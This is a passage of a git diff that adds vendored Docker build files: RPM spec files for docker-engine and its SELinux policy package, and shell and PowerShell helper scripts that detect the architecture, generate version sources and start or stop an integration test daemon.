@@ -0,0 +1,96 @@
+# Some bits borrowed from the openstack-selinux package
+Name: docker-engine-selinux
+Version: %{_version}
+Release: %{_release}%{?dist}
+Summary: SELinux Policies for the open-source application container engine
+BuildArch: noarch
+Group: Tools/Docker
+
+License: GPLv2
+Source: %{name}.tar.gz
+
+URL: https://dockerproject.org
+Vendor: Docker
+Packager: Docker <support@docker.com>
+
+%global selinux_policyver 3.13.1-102
+%global selinuxtype targeted
+%global moduletype  services
+%global modulenames docker
+
+Requires(post): selinux-policy-base >= %{selinux_policyver}, selinux-policy-targeted >= %{selinux_policyver}, policycoreutils, policycoreutils-python libselinux-utils
+BuildRequires: selinux-policy selinux-policy-devel
+
+# conflicting packages
+Conflicts: docker-selinux
+
+# Usage: _format var format
+#   Expand 'modulenames' into various formats as needed
+#   Format must contain '$x' somewhere to do anything useful
+%global _format() export %1=""; for x in %{modulenames}; do %1+=%2; %1+=" "; done;
+
+# Relabel files
+%global relabel_files() \
+    /sbin/restorecon -R %{_bindir}/docker %{_localstatedir}/run/docker.sock %{_localstatedir}/run/docker.pid %{_sysconfdir}/docker %{_localstatedir}/log/docker %{_localstatedir}/log/lxc %{_localstatedir}/lock/lxc %{_usr}/lib/systemd/system/docker.service /root/.docker &> /dev/null || : \
+
+%description
+SELinux policy modules for use with Docker
+
+%prep
+%if 0%{?centos} <= 6
+%setup -n %{name}
+%else
+%autosetup -n %{name}
+%endif
+
+%build
+make SHARE="%{_datadir}" TARGETS="%{modulenames}"
+
+%install
+
+# Install SELinux interfaces
+%_format INTERFACES $x.if
+install -d %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype}
+install -p -m 644 $INTERFACES %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype}
+
+# Install policy modules
+%_format MODULES $x.pp.bz2
+install -d %{buildroot}%{_datadir}/selinux/packages
+install -m 0644 $MODULES %{buildroot}%{_datadir}/selinux/packages
+
+%post
+#
+# Install all modules in a single transaction
+#
+if [ $1 -eq 1 ]; then
+    %{_sbindir}/setsebool -P -N virt_use_nfs=1 virt_sandbox_use_all_caps=1
+fi
+%_format MODULES %{_datadir}/selinux/packages/$x.pp.bz2
+%{_sbindir}/semodule -n -s %{selinuxtype} -i $MODULES
+if %{_sbindir}/selinuxenabled ; then
+    %{_sbindir}/load_policy
+    %relabel_files
+    if [ $1 -eq 1 ]; then
+      restorecon -R %{_sharedstatedir}/docker
+    fi
+fi
+
+%postun
+if [ $1 -eq 0 ]; then
+    %{_sbindir}/semodule -n -r %{modulenames} &> /dev/null || :
+    if %{_sbindir}/selinuxenabled ; then
+        %{_sbindir}/load_policy
+        %relabel_files
+    fi
+fi
+
+%files
+%doc LICENSE
+%defattr(-,root,root,0755)
+%attr(0644,root,root) %{_datadir}/selinux/packages/*.pp.bz2
+%attr(0644,root,root) %{_datadir}/selinux/devel/include/%{moduletype}/*.if
+
+%changelog
+* Tue Dec 1 2015 Jessica Frazelle <acidburn@docker.com> 1.9.1-1
+- add licence to rpm
+- add selinux-policy and docker-engine-selinux rpm
diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec
new file mode 100644
index 0000000000..d53e55b6c9
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec
@@ -0,0 +1,254 @@
+Name: docker-engine
+Version: %{_version}
+Release: %{_release}%{?dist}
+Summary: The open-source application container engine
+Group: Tools/Docker
+
+License: ASL 2.0
+Source: %{name}.tar.gz
+
+URL: https://dockerproject.org
+Vendor: Docker
+Packager: Docker <support@docker.com>
+
+# is_systemd conditional
+%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?suse_version} >= 1210
+%global is_systemd 1
+%endif
+
+# required packages for build
+# most are already in the container (see contrib/builder/rpm/ARCH/generate.sh)
+# only require systemd on those systems
+%if 0%{?is_systemd}
+%if 0%{?suse_version} >= 1210
+BuildRequires: systemd-rpm-macros
+%{?systemd_requires}
+%else
+%if 0%{?fedora} >= 25
+# Systemd 230 and up no longer have libsystemd-journal (see https://bugzilla.redhat.com/show_bug.cgi?id=1350301)
+BuildRequires: pkgconfig(systemd)
+Requires: systemd-units
+%else
+BuildRequires: pkgconfig(systemd)
+Requires: systemd-units
+BuildRequires: pkgconfig(libsystemd-journal)
+%endif
+%endif
+%else
+Requires(post): chkconfig
+Requires(preun): chkconfig
+# This is for /sbin/service
+Requires(preun): initscripts
+%endif
+
+# required packages on install
+Requires: /bin/sh
+Requires: iptables
+%if !0%{?suse_version}
+Requires: libcgroup
+%else
+Requires: libcgroup1
+%endif
+Requires: tar
+Requires: xz
+%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
+# Resolves: rhbz#1165615
+Requires: device-mapper-libs >= 1.02.90-1
+%endif
+%if 0%{?oraclelinux} >= 6
+# Require Oracle Unbreakable Enterprise Kernel R4 and newer device-mapper
+Requires: kernel-uek >= 4.1
+Requires: device-mapper >= 1.02.90-2
+%endif
+
+# docker-selinux conditional
+%if 0%{?fedora} >= 20 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
+%global with_selinux 1
+%endif
+
+# DWZ problem with multiple golang binary, see bug
+# https://bugzilla.redhat.com/show_bug.cgi?id=995136#c12
+%if 0%{?fedora} >= 20 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
+%global _dwz_low_mem_die_limit 0
+%endif
+
+# start if with_selinux
+%if 0%{?with_selinux}
+# Version of SELinux we were using
+%if 0%{?fedora} == 20
+%global selinux_policyver 3.12.1-197
+%endif # fedora 20
+%if 0%{?fedora} == 21
+%global selinux_policyver 3.13.1-105
+%endif # fedora 21
+%if 0%{?fedora} >= 22
+%global selinux_policyver 3.13.1-128
+%endif # fedora 22
+%if 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7
+%global selinux_policyver 3.13.1-23
+%endif # centos,oraclelinux 7
+%endif # with_selinux
+
+# RE: rhbz#1195804 - ensure min NVR for selinux-policy
+%if 0%{?with_selinux}
+Requires: selinux-policy >= %{selinux_policyver}
+Requires(pre): %{name}-selinux >= %{version}-%{release}
+%endif # with_selinux
+
+# conflicting packages
+Conflicts: docker
+Conflicts: docker-io
+Conflicts: docker-engine-cs
+
+%description
+Docker is an open source project to build, ship and run any application as a
+lightweight container.
+
+Docker containers are both hardware-agnostic and platform-agnostic. This means
+they can run anywhere, from your laptop to the largest EC2 compute instance and
+everything in between - and they don't require you to use a particular
+language, framework or packaging system. That makes them great building blocks
+for deploying and scaling web apps, databases, and backend services without
+depending on a particular stack or provider.
+
+%prep
+%if 0%{?centos} <= 6 || 0%{?oraclelinux} <=6
+%setup -n %{name}
+%else
+%autosetup -n %{name}
+%endif
+
+%build
+export DOCKER_GITCOMMIT=%{_gitcommit}
+./hack/make.sh dynbinary
+# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here
+
+%check
+./bundles/%{_origversion}/dynbinary-client/docker -v
+./bundles/%{_origversion}/dynbinary-daemon/dockerd -v
+
+%install
+# install binary
+install -d $RPM_BUILD_ROOT/%{_bindir}
+install -p -m 755 bundles/%{_origversion}/dynbinary-client/docker-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/docker
+install -p -m 755 bundles/%{_origversion}/dynbinary-daemon/dockerd-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/dockerd
+
+# install proxy
+install -p -m 755 /usr/local/bin/docker-proxy $RPM_BUILD_ROOT/%{_bindir}/docker-proxy
+
+# install containerd
+install -p -m 755 /usr/local/bin/docker-containerd $RPM_BUILD_ROOT/%{_bindir}/docker-containerd
+install -p -m 755 /usr/local/bin/docker-containerd-shim $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-shim
+install -p -m 755 /usr/local/bin/docker-containerd-ctr $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-ctr
+
+# install runc
+install -p -m 755 /usr/local/bin/docker-runc $RPM_BUILD_ROOT/%{_bindir}/docker-runc
+
+# install tini
+install -p -m 755 /usr/local/bin/docker-init $RPM_BUILD_ROOT/%{_bindir}/docker-init
+
+# install udev rules
+install -d $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d
+install -p -m 644 contrib/udev/80-docker.rules $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d/80-docker.rules
+
+# add init scripts
+install -d $RPM_BUILD_ROOT/etc/sysconfig
+install -d $RPM_BUILD_ROOT/%{_initddir}
+
+
+%if 0%{?is_systemd}
+install -d $RPM_BUILD_ROOT/%{_unitdir}
+install -p -m 644 contrib/init/systemd/docker.service.rpm $RPM_BUILD_ROOT/%{_unitdir}/docker.service
+%else
+install -p -m 644 contrib/init/sysvinit-redhat/docker.sysconfig $RPM_BUILD_ROOT/etc/sysconfig/docker
+install -p -m 755 contrib/init/sysvinit-redhat/docker $RPM_BUILD_ROOT/%{_initddir}/docker
+%endif
+# add bash, zsh, and fish completions
+install -d $RPM_BUILD_ROOT/usr/share/bash-completion/completions
+install -d $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions
+install -d $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d
+install -p -m 644 contrib/completion/bash/docker $RPM_BUILD_ROOT/usr/share/bash-completion/completions/docker
+install -p -m 644 contrib/completion/zsh/_docker $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions/_docker
+install -p -m 644 contrib/completion/fish/docker.fish $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d/docker.fish
+
+# install manpages
+install -d %{buildroot}%{_mandir}/man1
+install -p -m 644 man/man1/*.1 $RPM_BUILD_ROOT/%{_mandir}/man1
+install -d %{buildroot}%{_mandir}/man5
+install -p -m 644 man/man5/*.5 $RPM_BUILD_ROOT/%{_mandir}/man5
+install -d %{buildroot}%{_mandir}/man8
+install -p -m 644 man/man8/*.8 $RPM_BUILD_ROOT/%{_mandir}/man8
+
+# add vimfiles
+install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc
+install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect
+install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax
+install -p -m 644 contrib/syntax/vim/doc/dockerfile.txt $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc/dockerfile.txt
+install -p -m 644 contrib/syntax/vim/ftdetect/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect/dockerfile.vim
+install -p -m 644 contrib/syntax/vim/syntax/dockerfile.vim $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax/dockerfile.vim
+
+# add nano
+install -d $RPM_BUILD_ROOT/usr/share/nano
+install -p -m 644 contrib/syntax/nano/Dockerfile.nanorc $RPM_BUILD_ROOT/usr/share/nano/Dockerfile.nanorc
+
+# list files owned by the package here
+%files
+%doc AUTHORS CHANGELOG.md CONTRIBUTING.md LICENSE MAINTAINERS NOTICE README.md
+/%{_bindir}/docker
+/%{_bindir}/dockerd
+/%{_bindir}/docker-containerd
+/%{_bindir}/docker-containerd-shim
+/%{_bindir}/docker-containerd-ctr
+/%{_bindir}/docker-proxy
+/%{_bindir}/docker-runc
+/%{_bindir}/docker-init
+/%{_sysconfdir}/udev/rules.d/80-docker.rules
+%if 0%{?is_systemd}
+/%{_unitdir}/docker.service
+%else
+%config(noreplace,missingok) /etc/sysconfig/docker
+/%{_initddir}/docker
+%endif
+/usr/share/bash-completion/completions/docker
+/usr/share/zsh/vendor-completions/_docker
+/usr/share/fish/vendor_completions.d/docker.fish
+%doc
+/%{_mandir}/man1/*
+/%{_mandir}/man5/*
+/%{_mandir}/man8/*
+/usr/share/vim/vimfiles/doc/dockerfile.txt
+/usr/share/vim/vimfiles/ftdetect/dockerfile.vim
+/usr/share/vim/vimfiles/syntax/dockerfile.vim
+/usr/share/nano/Dockerfile.nanorc
+
+%post
+%if 0%{?is_systemd}
+%systemd_post docker
+%else
+# This adds the proper /etc/rc*.d links for the script
+/sbin/chkconfig --add docker
+%endif
+if ! getent group docker > /dev/null; then
+    groupadd --system docker
+fi
+
+%preun
+%if 0%{?is_systemd}
+%systemd_preun docker
+%else
+if [ $1 -eq 0 ] ; then
+    /sbin/service docker stop >/dev/null 2>&1
+    /sbin/chkconfig --del docker
+fi
+%endif
+
+%postun
+%if 0%{?is_systemd}
+%systemd_postun_with_restart docker
+%else
+if [ "$1" -ge "1" ] ; then
+    /sbin/service docker condrestart >/dev/null 2>&1 || :
+fi
+%endif
+
+%changelog
diff --git a/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch
new file mode 100644
index 0000000000..73955392d0
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch
@@ -0,0 +1,69 @@
+#!/bin/bash
+set -e
+
+docker-version-osarch() {
+	local target="$1" # "Client" or "Server"
+	local fmtStr="{{.${target}.Os}}/{{.${target}.Arch}}"
+	if docker version -f "$fmtStr" 2>/dev/null; then
+		# if "docker version -f" works, let's just use that!
+		return
+	fi
+	docker version | awk '
+		$1 ~ /^(Client|Server):$/ { section = 0 }
+		$1 == "'"$target"':" { section = 1; next }
+		section && $1 == "OS/Arch:" { print $2 }
+
+		# old versions of Docker
+		$1 == "OS/Arch" && $2 == "('"${target,,}"'):" { print $3 }
+	'
+}
+
+# Retrieve OS/ARCH of docker daemon, e.g. linux/amd64
+export DOCKER_ENGINE_OSARCH="$(docker-version-osarch 'Server')"
+export DOCKER_ENGINE_GOOS="${DOCKER_ENGINE_OSARCH%/*}"
+export DOCKER_ENGINE_GOARCH="${DOCKER_ENGINE_OSARCH##*/}"
+DOCKER_ENGINE_GOARCH=${DOCKER_ENGINE_GOARCH:=amd64}
+
+# and the client, just in case
+export DOCKER_CLIENT_OSARCH="$(docker-version-osarch 'Client')"
+export DOCKER_CLIENT_GOOS="${DOCKER_CLIENT_OSARCH%/*}"
+export DOCKER_CLIENT_GOARCH="${DOCKER_CLIENT_OSARCH##*/}"
+DOCKER_CLIENT_GOARCH=${DOCKER_CLIENT_GOARCH:=amd64}
+
+# Retrieve the architecture used in contrib/builder/(deb|rpm)/$PACKAGE_ARCH/
+PACKAGE_ARCH='amd64'
+case "${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}" in
+	arm)
+		PACKAGE_ARCH='armhf'
+		;;
+	arm64)
+		PACKAGE_ARCH='aarch64'
+		;;
+	amd64|ppc64le|s390x)
+		PACKAGE_ARCH="${DOCKER_ENGINE_GOARCH:-$DOCKER_CLIENT_GOARCH}"
+		;;
+	*)
+		echo >&2 "warning: not sure how to convert '$DOCKER_ENGINE_GOARCH' to a 'Docker' arch, assuming '$PACKAGE_ARCH'"
+		;;
+esac
+export PACKAGE_ARCH
+
+DOCKERFILE='Dockerfile'
+TEST_IMAGE_NAMESPACE=
+case "$PACKAGE_ARCH" in
+	amd64)
+		case "${DOCKER_ENGINE_GOOS:-$DOCKER_CLIENT_GOOS}" in
+			windows)
+				DOCKERFILE='Dockerfile.windows'
+				;;
+			solaris)
+				DOCKERFILE='Dockerfile.solaris'
+				;;
+		esac
+		;;
+	*)
+		DOCKERFILE="Dockerfile.$PACKAGE_ARCH"
+		TEST_IMAGE_NAMESPACE="$PACKAGE_ARCH"
+		;;
+esac
+export DOCKERFILE TEST_IMAGE_NAMESPACE
diff --git a/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs
new file mode 100644
index 0000000000..e71a30ae81
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.ensure-emptyfs
@@ -0,0 +1,23 @@
+#!/bin/bash
+set -e
+
+if ! docker inspect emptyfs &> /dev/null; then
+	# let's build a "docker save" tarball for "emptyfs"
+	# see https://github.com/docker/docker/pull/5262
+	# and also https://github.com/docker/docker/issues/4242
+	dir="$DEST/emptyfs"
+	mkdir -p "$dir"
+	(
+		cd "$dir"
+		echo '{"emptyfs":{"latest":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158"}}' > repositories
+		mkdir -p 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158
+		(
+			cd 511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158
+			echo '{"id":"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158","comment":"Imported from -","created":"2013-06-13T14:03:50.821769-07:00","container_config":{"Hostname":"","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":null},"docker_version":"0.4.0","architecture":"x86_64","Size":0}' > json
+			echo '1.0' > VERSION
+			tar -cf layer.tar --files-from /dev/null
+		)
+	)
+	( set -x; tar -cC "$dir" . | docker load )
+	rm -rf "$dir"
+fi
diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen b/vendor/github.com/docker/docker/hack/make/.go-autogen
new file mode 100644
index 0000000000..4d26052bb7
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.go-autogen
@@ -0,0 +1,86 @@
+#!/bin/bash
+
+rm -rf autogen
+
+source hack/dockerfile/binaries-commits
+
+cat > dockerversion/version_autogen.go <<DVEOF
+// +build autogen
+
+// Package dockerversion is auto-generated at build-time
+package dockerversion
+
+// Default build-time variable for library-import.
+// This file is overridden on build with build-time informations.
+const (
+	GitCommit          string = "$GITCOMMIT"
+	Version            string = "$VERSION"
+	BuildTime          string = "$BUILDTIME"
+	IAmStatic          string = "${IAMSTATIC:-true}"
+)
+
+// AUTOGENERATED FILE; see /go/src/github.com/docker/docker/hack/make/.go-autogen
+DVEOF
+
+cat > dockerversion/version_autogen_unix.go <<DVEOF
+// +build autogen,!windows
+
+// Package dockerversion is auto-generated at build-time
+package dockerversion
+
+// Default build-time variable for library-import.
+// This file is overridden on build with build-time informations.
+const (
+	ContainerdCommitID string = "${CONTAINERD_COMMIT}"
+	RuncCommitID       string = "${RUNC_COMMIT}"
+	InitCommitID       string = "${TINI_COMMIT}"
+)
+
+// AUTOGENERATED FILE; see /go/src/github.com/docker/docker/hack/make/.go-autogen
+DVEOF
+
+# Compile the Windows resources into the sources
+if [ "$(go env GOOS)" = "windows" ]; then
+	mkdir -p autogen/winresources/tmp autogen/winresources/docker autogen/winresources/dockerd
+	cp hack/make/.resources-windows/resources.go autogen/winresources/docker/
+	cp hack/make/.resources-windows/resources.go autogen/winresources/dockerd/
+
+	if [ "$(go env GOHOSTOS)" == "windows" ]; then
+		WINDRES=windres
+		WINDMC=windmc
+	else
+		# Cross compiling
+		WINDRES=x86_64-w64-mingw32-windres
+		WINDMC=x86_64-w64-mingw32-windmc
+	fi
+
+	# Generate a Windows file version of the form major,minor,patch,build (with any part optional)
+	VERSION_QUAD=$(echo -n $VERSION | sed -re 's/^([0-9.]*).*$/\1/' | tr . ,)
+
+	# Pass version and commit information into the resource compiler
+	defs=
+	[ ! -z $VERSION ]      && defs="$defs -D DOCKER_VERSION=\"$VERSION\""
+	[ ! -z $VERSION_QUAD ] && defs="$defs -D DOCKER_VERSION_QUAD=$VERSION_QUAD"
+	[ ! -z $GITCOMMIT ]    && defs="$defs -D DOCKER_COMMIT=\"$GITCOMMIT\""
+
+	function makeres {
+		$WINDRES \
+			-i hack/make/.resources-windows/$1 \
+			-o $3 \
+			-F $2 \
+			--use-temp-file \
+			-I autogen/winresources/tmp \
+			$defs
+	}
+
+	$WINDMC \
+		hack/make/.resources-windows/event_messages.mc \
+		-h autogen/winresources/tmp \
+		-r autogen/winresources/tmp
+
+	makeres docker.rc pe-x86-64 autogen/winresources/docker/rsrc_amd64.syso
+	makeres docker.rc pe-i386 autogen/winresources/docker/rsrc_386.syso
+	makeres dockerd.rc pe-x86-64 autogen/winresources/dockerd/rsrc_amd64.syso
+
+	rm -r autogen/winresources/tmp
+fi
diff --git a/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1 b/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1
new file mode 100644
index 0000000000..3adc4c3e97
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.go-autogen.ps1
@@ -0,0 +1,91 @@
+<#
+.NOTES
+    Author:  @jhowardmsft
+
+    Summary: Windows native version of .go-autogen which generates the
+             .go source code for building, and performs resource compilation.
+
+.PARAMETER CommitString
+     The commit string. This is calculated externally to this script.
+
+.PARAMETER DockerVersion
+     The version such as 1.14.0-dev. This is calculated externally to this script.
+#>
+
+param(
+    [Parameter(Mandatory=$true)][string]$CommitString,
+    [Parameter(Mandatory=$true)][string]$DockerVersion
+)
+
+$ErrorActionPreference = "Stop"
+
+# Utility function to get the build date/time in UTC
+Function Get-BuildDateTime() {
+    return $(Get-Date).ToUniversalTime()
+}
+
+try {
+    $buildDateTime=Get-BuildDateTime
+
+    if (Test-Path ".\autogen") {
+        Remove-Item ".\autogen" -Recurse -Force | Out-Null
+    }
+
+    $fileContents = '
+// +build autogen
+
+// Package dockerversion is auto-generated at build-time
+package dockerversion
+
+// Default build-time variable for library-import.
+// This file is overridden on build with build-time informations.
+const (
+    GitCommit          string = "'+$CommitString+'"
+    Version            string = "'+$DockerVersion+'"
+    BuildTime          string = "'+$buildDateTime+'"
+)
+
+// AUTOGENERATED FILE; see hack\make\.go-autogen.ps1
+'
+
+    # Write the file without BOM
+    $outputFile="$(pwd)\dockerversion\version_autogen.go"
+    if (Test-Path $outputFile) { Remove-Item $outputFile }
+    [System.IO.File]::WriteAllText($outputFile, $fileContents, (New-Object System.Text.UTF8Encoding($False)))
+
+    New-Item -ItemType Directory -Path "autogen\winresources\tmp" | Out-Null
+    New-Item -ItemType Directory -Path "autogen\winresources\docker" | Out-Null
+    New-Item -ItemType Directory -Path "autogen\winresources\dockerd" | Out-Null
+    Copy-Item "hack\make\.resources-windows\resources.go" "autogen\winresources\docker"
+    Copy-Item "hack\make\.resources-windows\resources.go" "autogen\winresources\dockerd"
+
+    # Generate a version in the form major,minor,patch,build
+    $versionQuad=$DockerVersion -replace "[^0-9.]*" -replace "\.", ","
+
+    # Compile the messages
+    windmc hack\make\.resources-windows\event_messages.mc -h autogen\winresources\tmp -r autogen\winresources\tmp
+    if ($LASTEXITCODE -ne 0) { Throw "Failed to compile event message resources" }
+
+    # If you really want to understand this madness below, search the Internet for powershell variables after verbatim arguments... Needed to get double-quotes passed through to the compiler options.
+    # Generate the .syso files containing all the resources and manifest needed to compile the final docker binaries. Both 32 and 64-bit clients.
+    $env:_ag_dockerVersion=$DockerVersion
+    $env:_ag_gitCommit=$CommitString
+
+    windres -i hack/make/.resources-windows/docker.rc  -o autogen/winresources/docker/rsrc_amd64.syso  -F pe-x86-64 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed to compile client 64-bit resources" }
+
+    windres -i hack/make/.resources-windows/docker.rc  -o autogen/winresources/docker/rsrc_386.syso    -F pe-i386   --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed to compile client 32-bit resources" }
+
+    windres -i hack/make/.resources-windows/dockerd.rc -o autogen/winresources/dockerd/rsrc_amd64.syso -F pe-x86-64 --use-temp-file -I autogen/winresources/tmp -D DOCKER_VERSION_QUAD=$versionQuad --% -D DOCKER_VERSION=\"%_ag_dockerVersion%\" -D DOCKER_COMMIT=\"%_ag_gitCommit%\"
+    if ($LASTEXITCODE -ne 0) { Throw "Failed to compile daemon resources" }
+}
+Catch [Exception] {
+    # Throw the error onto the caller to display errors. We don't expect this script to be called directly 
+    Throw ".go-autogen.ps1 failed with error $_"
+}
+Finally {
+    Remove-Item .\autogen\winresources\tmp -Recurse -Force -ErrorAction SilentlyContinue | Out-Null
+    $env:_ag_dockerVersion=""
+    $env:_ag_gitCommit=""
+}
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup
new file mode 100644
index 0000000000..0efde717fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-setup
@@ -0,0 +1,7 @@
+#!/bin/bash
+set -e
+
+bundle .detect-daemon-osarch
+if [ $DOCKER_ENGINE_GOOS != "windows" ]; then
+	bundle .ensure-emptyfs
+fi
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-start b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start
new file mode 100644
index 0000000000..b96979bdb2
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-start
@@ -0,0 +1,116 @@
+#!/bin/bash
+
+# see test-integration-cli for example usage of this script
+
+base="$ABS_DEST/.."
+export PATH="$base/binary-client:$base/binary-daemon:$base/dynbinary-client:$base/dynbinary-daemon:$PATH"
+
+if ! command -v docker &> /dev/null; then
+	echo >&2 'error: binary-client or dynbinary-client must be run before .integration-daemon-start'
+	false
+fi
+
+# This is a temporary hack for split-binary mode. It can be removed once
+# https://github.com/docker/docker/pull/22134 is merged into docker master
+if [ "$(go env GOOS)" = 'windows' ]; then
+       return
+fi
+
+if [ -z "$DOCKER_TEST_HOST" ]; then
+	if docker version &> /dev/null; then
+		echo >&2 'skipping daemon start, since daemon appears to be already started'
+		return
+	fi
+fi
+
+if ! command -v dockerd &> /dev/null; then
+	echo >&2 'error: binary-daemon or dynbinary-daemon must be run before .integration-daemon-start'
+	false
+fi
+
+# intentionally open a couple bogus file descriptors to help test that they get scrubbed in containers
+exec 41>&1 42>&2
+
+export DOCKER_GRAPHDRIVER=${DOCKER_GRAPHDRIVER:-vfs}
+export DOCKER_USERLANDPROXY=${DOCKER_USERLANDPROXY:-true}
+
+# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G"
+storage_params=""
+if [ -n "$DOCKER_STORAGE_OPTS" ]; then
+	IFS=','
+	for i in ${DOCKER_STORAGE_OPTS}; do
+		storage_params="--storage-opt $i $storage_params"
+	done
+	unset IFS
+fi
+
+# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G"
+extra_params=""
+if [ "$DOCKER_REMAP_ROOT" ]; then
+	extra_params="--userns-remap $DOCKER_REMAP_ROOT"
+fi
+
+if [  "$DOCKER_EXPERIMENTAL" ]; then
+	echo >&2 '# DOCKER_EXPERIMENTAL is set: starting daemon with experimental features enabled! '
+	extra_params="$extra_params --experimental"
+fi
+
+if [ -z "$DOCKER_TEST_HOST" ]; then
+	# Start apparmor if it is enabled
+	if [ -e "/sys/module/apparmor/parameters/enabled" ] && [ "$(cat /sys/module/apparmor/parameters/enabled)" == "Y" ]; then
+		# reset container variable so apparmor profile is applied to process
+		# see https://github.com/docker/libcontainer/blob/master/apparmor/apparmor.go#L16
+		export container=""
+		(
+			set -x
+			/etc/init.d/apparmor start
+		)
+	fi
+
+	export DOCKER_HOST="unix://$(cd "$DEST" && pwd)/docker.sock" # "pwd" tricks to make sure $DEST is an absolute path, not a relative one
+	( set -x; exec \
+		dockerd --debug \
+		--host "$DOCKER_HOST" \
+		--storage-driver "$DOCKER_GRAPHDRIVER" \
+		--pidfile "$DEST/docker.pid" \
+		--userland-proxy="$DOCKER_USERLANDPROXY" \
+		$storage_params \
+		$extra_params \
+			&> "$DEST/docker.log"
+	) &
+	# make sure that if the script exits unexpectedly, we stop this daemon we just started
+	trap 'bundle .integration-daemon-stop' EXIT
+else
+	export DOCKER_HOST="$DOCKER_TEST_HOST"
+fi
+
+# give it a little time to come up so it's "ready"
+tries=60
+echo "INFO: Waiting for daemon to start..."
+while ! docker version &> /dev/null; do
+	(( tries-- ))
+	if [ $tries -le 0 ]; then
+		printf "\n"
+		if [ -z "$DOCKER_HOST" ]; then
+			echo >&2 "error: daemon failed to start"
+			echo >&2 "  check $DEST/docker.log for details"
+		else
+			echo >&2 "error: daemon at $DOCKER_HOST fails to 'docker version':"
+			docker version >&2 || true
+			# Additional Windows CI debugging as this is a common error as of
+			# January 2016
+			if [ "$(go env GOOS)" = 'windows' ]; then
+				echo >&2 "Container log below:"
+				echo >&2 "---"
+				# Important - use the docker on the CI host, not the one built locally
+				# which is currently in our path.
+				! /c/bin/docker -H=$MAIN_DOCKER_HOST logs docker-$COMMITHASH
+				echo >&2 "---"
+			fi
+		fi
+		false
+	fi
+	printf "."
+	sleep 2
+done
+printf "\n"
diff --git a/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop
new file mode 100644
index 0000000000..03c1b14689
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/.integration-daemon-stop
@@ -0,0 +1,27 @@
+#!/bin/bash
+
+if [ ! "$(go env GOOS)" = 'windows' ]; then
+	trap - EXIT # reset EXIT trap applied in .integration-daemon-start
+
+	for pidFile in $(find "$DEST" -name docker.pid); do
+		pid=$(set -x; cat "$pidFile")
+		( set -x; kill "$pid" )
+		if ! wait "$pid"; then
